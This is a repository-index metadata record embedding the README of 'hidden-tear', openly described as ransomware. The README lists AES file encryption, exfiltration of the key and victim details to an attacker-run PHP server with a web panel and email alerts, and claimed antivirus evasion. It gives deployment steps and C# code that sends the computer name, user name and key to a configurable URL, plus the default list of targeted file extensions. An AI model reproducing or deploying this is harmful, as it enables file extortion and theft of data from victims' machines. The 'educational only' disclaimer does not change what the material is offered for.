{"id":13677311,"url":"https://github.com/Virgula0/hidden-tear","last_synced_at":"2025-04-29T11:30:25.771Z","repository":{"id":168591112,"uuid":"91960499","full_name":"Virgula0/hidden-tear","owner":"Virgula0","description":"An open source RansomWare","archived":false,"fork":false,"pushed_at":"2019-11-24T14:11:17.000Z","size":194,"stargazers_count":87,"open_issues_count":1,"forks_count":42,"subscribers_count":10,"default_branch":"master","last_synced_at":"2025-04-14T16:49:13.798Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Virgula0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-05-21T13:47:48.000Z","updated_at":"2025-04-14T16:11:40.000Z","dependencies_parsed_at":"2024-01-14T15:38:11.132Z","dependency_job_id":null,"html_url":"https://github.com/Virgula0/hidden-tear","commit_stats":null,"previous_names":["virgula0/hidden-tear"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Virgula0%2Fhidden-tear","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Virgula0%2Fhidden-tear/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Virgula0%2Fhidden-tear/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Virgula0%2Fhidden-tear/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Virgula0","download_url":"https://codeload.github.com/Virgula0/hidden-tear/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251493627,"owners_count":21598144,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T13:00:40.253Z","updated_at":"2025-04-29T11:30:25.336Z","avatar_url":"https://github.com/Virgula0.png","language":"C#","funding_links":["https://paypal.me/Virgula"],"categories":["C# #"],"sub_categories":[],"readme":" _ _ _ _ _ \n | | (_) | | | | | | \n | |__ _ __| | __| | ___ _ __ | |_ ___ __ _ _ __ \n | '_ \\| |/ _` |/ _` |/ _ \\ '_ \\ | __/ _ \\/ _` | '__|\n | | | | | (_| | (_| | __/ | | | | || __/ (_| | | \n |_| |_|_|\\__,_|\\__,_|\\___|_| |_| \\__\\___|\\__,_|_| \n \nIt's a ransomware-like file crypter sample which can be modified for specific purposes. \n\n**Features**\n* Uses AES algorithm to encrypt files.\n* Sends encryption key to a server.\n* Encrypted files can be decrypt in decrypter program with encryption key.\n* Creates a text file in Desktop with given message.\n* Small file size (12 KB)\n* Isn't detected by antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt - Do not scan with VirusTotal or similar sites.\n* This project was updated by Virgula0 and coded by Uktu Sen.\n\n**New features:**\n* A new advanced server script was added that saves data into database.\n* All informations are sent if there is an internet connection and the ransomware wait for it if there isn't.\n* You can see all target information with Server Attacker panel.\n* Script can also send you an email with gathered data.\n* It can also encrypt .exe files and no longer gets collisions with other processes.\n* It now encrypts a wider variety of file types and has a changing desktop icon with information about the attack.\n* Hidden Tear Decryptor now advises if files have been decrypted or not.\n* Hidden Tear Decryptor now is able to decrypt the same directories of hidden-tear ransomware.\n* Hidden Tear changes default Windows icon of desktop if decryption is succesfully finished.\n* A bug that could delete a part of the passcode while sending has been removed.\n\n***************************************************************************************************************************\nIf you want, you can send some BTC for this re-work and support me.\n* Address: 1HfwYmCDiHYRxzcbpDf7vSKfv8g9Y1MgpW | Or you can scan QR code named donation_btc_address.png in the main path\n* Paypal: https://paypal.me/Virgula\n* Ethereum 0x25119edFC9aA4D5beb40F24f5A759c4CA0263A54\n* Bitcoin Cash: qzmd7kn87q5dkmkzalwu6pct82e68skzksxdfxxd0a\n\nThank You!\t\t\t\t\t\t\t\t \n***************************************************************************************************************************\n\n**Demonstration Video**\n\nhttps://www.youtube.com/watch?v=0IvD9Sky9as\n\nWarning: in that video wasn't shown the attacker panel but only the key saved into the file to make the video lasts less.\n\n**Usage**\n\n* You need to have a web server which supports PHP. Change this line with your URL, using an HTTPS connection to avoid eavesdropping.\n\n `string targetURL = \"https://www.example.com/Server/write.php\";`\n\n * Default Username and password for webpanel (in check.php file) are -\u003e Username: test | Password: test\n * Import SQL table in your database importing the file: import.sql\n * Set you database credetials in the file: connect_db.php\n * If you want also write a file for every virus execution go to file `write.php` and uncomment lines 37 to 43. For privacy of information this is not recommended.\n * Set your email to get information also by email (don't write your PERSONAL email) in line 47 of file write.php\n\n* The script should write the GET parameter into a database and optionally into a text file. Sending process running in `SendPassword()` function:\n\n ```\n string info = \"?computer_name=\" + computerName + \"\u0026userName=\" + userName + \"\u0026password=\" + password + \"\u0026allow=ransom\";\n var fullUrl = targetURL + info;\n var conent = new System.Net.WebClient().DownloadString(fullUrl);\n \n ```\n* Target file extensions can be changed. Default list:\n```\nvar validExtensions = new[]{\".txt\", \".jar\", \".exe\", \".dat\", \".contact\" , \".settings\", \".doc\", \".docx\", \".xls\", \".xlsx\", \".ppt\", \".pptx\", \".odt\", \".jpg\", \".png\", \".csv\", \".py\", \".sql\", \".mdb\", \".sln\", \".php\", \".asp\", \".aspx\", \".html\", \".htm\", \".xml\", \".psd\" , \".pdf\" , \".dll\" , \".c\" , \".cs\", \".mp3\" , \".mp4\", \".f3d\" , \".dwg\" , \".cpp\" , \".zip\" , \".rar\" , \".mov\" , \".rtf\" , \".bmp\" , \".mkv\" , \".avi\" , \".apk\" , \".lnk\" , \".iso\", \".7-zip\", \".ace\", \".arj\", \".bz2\", \".cab\", \".gzip\", \".lzh\", \".tar\", \".uue\", \".xz\", \".z\", \".001\", \".mpeg\", \".mp3\", \".mpg\", \".core\", \".crproj\" , \".pdb\", \".ico\" , \".pas\" , \".db\" , \".torrent\" };\n```\n\n* PLEASE DON'T ADD .INI EXTENSION BECAUSE THE CONFILCT WITH THESE FILES WILL CRASH YOUR SCRIPT.\n* In this re-upload there is a function that waits for internet connection before sending password to the database:\n\n```\n//check for internet connection\npublic static bool CheckForInternetConnection()\n{\n try\n {\n using (var client = new WebClient())\n {\n using (var stream = client.OpenRead(\"https://www.google.com\"))\n {\n return true;\n }\n }\n }\n catch\n {\n return false;\n }\n}\n```\n\n**Legal Warning** \n\nWhile this may be helpful for some, there are significant risks. Hidden Tear may be used for educational purposes only. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running Hidden Tear, even though you are innocent.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FVirgula0%2Fhidden-tear","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FVirgula0%2Fhidden-tear","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FVirgula0%2Fhidden-tear/lists"}